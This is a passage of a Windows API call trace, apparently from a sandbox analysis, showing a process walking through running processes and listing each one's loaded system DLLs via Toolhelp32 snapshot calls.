	[0106.659] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.660] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.661] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.662] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.663] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.664] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.665] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.666] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.666] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.667] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.668] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.669] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.670] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.671] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.672] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 0
	[0106.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 21
	[0106.686] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0106.687] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xc14) returned 0x87c
	[0106.695] Module32FirstW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.695] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.696] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.697] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.698] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.699] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.699] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.700] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.701] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.702] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.702] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.703] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.704] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.705] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.705] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.706] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.707] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.708] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.709] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 0
	[0106.709] Module32FirstW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\volunteer.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\volunteer.exe", lpUsedDefaultChar=0x0) returned 44
	[0106.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 14
	[0106.710] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.711] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.712] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.713] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.713] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.714] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.715] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.716] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.717] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.718] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.719] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.726] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.727] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.728] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.729] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.730] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.731] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 1
	[0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.731] Module32NextW (hSnapshot=0x87c, lpme=0x20af280) returned 0
	[0106.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 14
	[0106.732] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0106.733] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xc1c) returned 0x880
	[0106.740] Module32FirstW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.741] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.742] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.743] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.743] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.744] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.745] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.746] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.746] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.747] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.748] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.749] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.750] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.750] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.751] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.752] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.753] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.753] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.754] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 0
	[0106.755] Module32FirstW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\WindowsPowerShell\\ranger_tu_community.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\WindowsPowerShell\\ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 65
